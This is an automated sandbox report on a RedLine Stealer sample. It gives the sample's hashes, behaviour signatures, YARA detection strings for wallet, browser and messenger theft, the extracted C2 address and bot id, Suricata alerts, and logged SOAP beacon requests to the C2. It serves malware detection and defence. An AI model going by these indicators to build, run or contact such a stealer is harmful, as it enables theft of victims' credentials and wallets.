Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aYf5ibGObB.exe

Overview

General Information

Sample name:aYf5ibGObB.exe
renamed because original name is a hash value
Original sample name:8a65e4ace5821564817c5f343352474c.exe
Analysis ID:1580472
MD5:8a65e4ace5821564817c5f343352474c
SHA1:5921aa00413c8ebcc7f639740e85f0389c8c7e09
SHA256:aeb46a41343bbbfb2a1fc6b6eec7e60657361be81c61c3adaa11357898a45d4b
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • aYf5ibGObB.exe (PID: 2104 cmdline: "C:\Users\user\Desktop\aYf5ibGObB.exe" MD5: 8A65E4ACE5821564817C5F343352474C)
    • RegSvcs.exe (PID: 3596 cmdline: "C:\Users\user\Desktop\aYf5ibGObB.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.222.58.90:55615"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x135ca:$a4: get_ScannedWallets
          • 0x12428:$a5: get_ScanTelegram
          • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
          • 0x1106a:$a7: <Processes>k__BackingField
          • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1099e:$a9: <ScanFTP>k__BackingField
          00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmpinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
          • 0x119cb:$gen01: ChromeGetRoamingName
          • 0x119ff:$gen02: ChromeGetLocalName
          • 0x11a28:$gen03: get_UserDomainName
          • 0x13c67:$gen04: get_encrypted_key
          • 0x131e3:$gen05: browserPaths
          • 0x1352b:$gen06: GetBrowsers
          • 0x12e61:$gen07: get_InstalledInputLanguages
          • 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
          • 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
          • 0x9118:$spe6: windows-1251, CommandLine:
          • 0x143bd:$spe9: *wallet*
          • 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
          • 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
          • 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042
          • 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
          • 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
          • 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
          • 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
          • 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
          • 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
          • 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
          00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1048a:$u7: RunPE
          • 0x13b41:$u8: DownloadAndEx
          • 0x9130:$pat14: , CommandLine:
          • 0x13079:$v2_1: ListOfProcesses
          • 0x1068b:$v2_2: get_ScanVPN
          • 0x1072e:$v2_2: get_ScanFTP
          • 0x1141e:$v2_2: get_ScanDiscord
          • 0x1240c:$v2_2: get_ScanSteam
          • 0x12428:$v2_2: get_ScanTelegram
          • 0x124ce:$v2_2: get_ScanScreen
          • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
          • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
          • 0x13509:$v2_2: get_ScanBrowsers
          • 0x135ca:$v2_2: get_ScannedWallets
          • 0x135f0:$v2_2: get_ScanWallets
          • 0x13610:$v2_3: GetArguments
          • 0x11cd9:$v2_4: VerifyUpdate
          • 0x165ea:$v2_4: VerifyUpdate
          • 0x139ca:$v2_5: VerifyScanRequest
          • 0x130c6:$v2_6: GetUpdates
          • 0x165cb:$v2_6: GetUpdates
          Click to see the 10 entries
          SourceRuleDescriptionAuthorStrings
          0.2.aYf5ibGObB.exe.19f0000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.aYf5ibGObB.exe.19f0000.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0.2.aYf5ibGObB.exe.19f0000.1.raw.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
              • 0x135ca:$a4: get_ScannedWallets
              • 0x12428:$a5: get_ScanTelegram
              • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
              • 0x1106a:$a7: <Processes>k__BackingField
              • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
              • 0x1099e:$a9: <ScanFTP>k__BackingField
              0.2.aYf5ibGObB.exe.19f0000.1.raw.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
              • 0x119cb:$gen01: ChromeGetRoamingName
              • 0x119ff:$gen02: ChromeGetLocalName
              • 0x11a28:$gen03: get_UserDomainName
              • 0x13c67:$gen04: get_encrypted_key
              • 0x131e3:$gen05: browserPaths
              • 0x1352b:$gen06: GetBrowsers
              • 0x12e61:$gen07: get_InstalledInputLanguages
              • 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
              • 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
              • 0x9118:$spe6: windows-1251, CommandLine:
              • 0x143bd:$spe9: *wallet*
              • 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
              • 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
              • 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042
              • 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
              • 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
              • 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
              • 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
              • 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
              • 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
              • 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
              0.2.aYf5ibGObB.exe.19f0000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1048a:$u7: RunPE
              • 0x13b41:$u8: DownloadAndEx
              • 0x9130:$pat14: , CommandLine:
              • 0x13079:$v2_1: ListOfProcesses
              • 0x1068b:$v2_2: get_ScanVPN
              • 0x1072e:$v2_2: get_ScanFTP
              • 0x1141e:$v2_2: get_ScanDiscord
              • 0x1240c:$v2_2: get_ScanSteam
              • 0x12428:$v2_2: get_ScanTelegram
              • 0x124ce:$v2_2: get_ScanScreen
              • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
              • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
              • 0x13509:$v2_2: get_ScanBrowsers
              • 0x135ca:$v2_2: get_ScannedWallets
              • 0x135f0:$v2_2: get_ScanWallets
              • 0x13610:$v2_3: GetArguments
              • 0x11cd9:$v2_4: VerifyUpdate
              • 0x165ea:$v2_4: VerifyUpdate
              • 0x139ca:$v2_5: VerifyScanRequest
              • 0x130c6:$v2_6: GetUpdates
              • 0x165cb:$v2_6: GetUpdates
              Click to see the 10 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T17:17:06.914116+010020450001Malware Command and Control Activity Detected185.222.58.9055615192.168.2.549704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T17:16:52.882997+010020450011Malware Command and Control Activity Detected185.222.58.9055615192.168.2.549704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T17:17:01.664167+010028496621Malware Command and Control Activity Detected192.168.2.549704185.222.58.9055615TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T17:17:07.226745+010028493511Malware Command and Control Activity Detected192.168.2.549704185.222.58.9055615TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T17:17:01.664167+010018000001Malware Command and Control Activity Detected192.168.2.549704185.222.58.9055615TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 2.2.RegSvcs.exe.380000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:55615"], "Bot Id": "cheat"}
              Source: aYf5ibGObB.exeReversingLabs: Detection: 78%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: aYf5ibGObB.exeJoe Sandbox ML: detected
              Source: aYf5ibGObB.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: wntdll.pdbUGP source: aYf5ibGObB.exe, 00000000.00000003.2059872587.0000000003610000.00000004.00001000.00020000.00000000.sdmp, aYf5ibGObB.exe, 00000000.00000003.2050970526.0000000003790000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: aYf5ibGObB.exe, 00000000.00000003.2059872587.0000000003610000.00000004.00001000.00020000.00000000.sdmp, aYf5ibGObB.exe, 00000000.00000003.2050970526.0000000003790000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0103DBBE
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0100C2A2 FindFirstFileExW,0_2_0100C2A2
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0104698F
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_010468EE FindFirstFileW,FindClose,0_2_010468EE
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0103D076
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0103D3A9
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0104979D
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01049642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_01049642
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01049B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_01049B2B
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01045C97 FindFirstFileW,FindNextFileW,FindClose,0_2_01045C97

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.5:49704 -> 185.222.58.90:55615
              Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49704 -> 185.222.58.90:55615
              Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.90:55615 -> 192.168.2.5:49704
              Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49704 -> 185.222.58.90:55615
              Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.90:55615 -> 192.168.2.5:49704
              Source: Malware configuration extractorURLs: 185.222.58.90:55615
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 55615
              Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 55615
              Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49704
              Source: global trafficTCP traffic: 192.168.2.5:49704 -> 185.222.58.90:55615
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: Joe Sandbox ViewIP Address: 185.222.58.90 185.222.58.90
              Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,0_2_0104CF1A
              Source: global trafficDNS traffic detected: DNS query: api.ip.sb
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2162985561.00000000026EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:55615
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:55615/
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ip.sb
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ip.sb.cdn.cloudflare.net
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
              Source: RegSvcs.exe, 00000002.00000002.2162985561.00000000026EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2162985561.0000000002712000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
              Source: RegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/
              Source: RegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
              Source: RegSvcs.exe, 00000002.00000002.2162985561.00000000026FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectT
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
              Source: RegSvcs.exe, 00000002.00000002.2162985561.0000000002712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
              Source: aYf5ibGObB.exe, 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
              Source: aYf5ibGObB.exe, 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
              Source: aYf5ibGObB.exe, 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0104EAFF
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0104ED6A
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0104EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0104EAFF
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_0103AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0103AB9C
              Source: C:\Users\user\Desktop\aYf5ibGObB.exeCode function: 0_2_01069576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_01069576

              System Summary

              barindex
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 2.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 2.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 0.2.aYf5ibGObB.exe.19f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: Process Memory Space: aYf5ibGObB.exe PID: 2104, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 3596, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: aYf5ibGObB.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: aYf5ibGObB.exe, 00000000.00000000.2033040209.0000000001092000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8cce0ccf-9
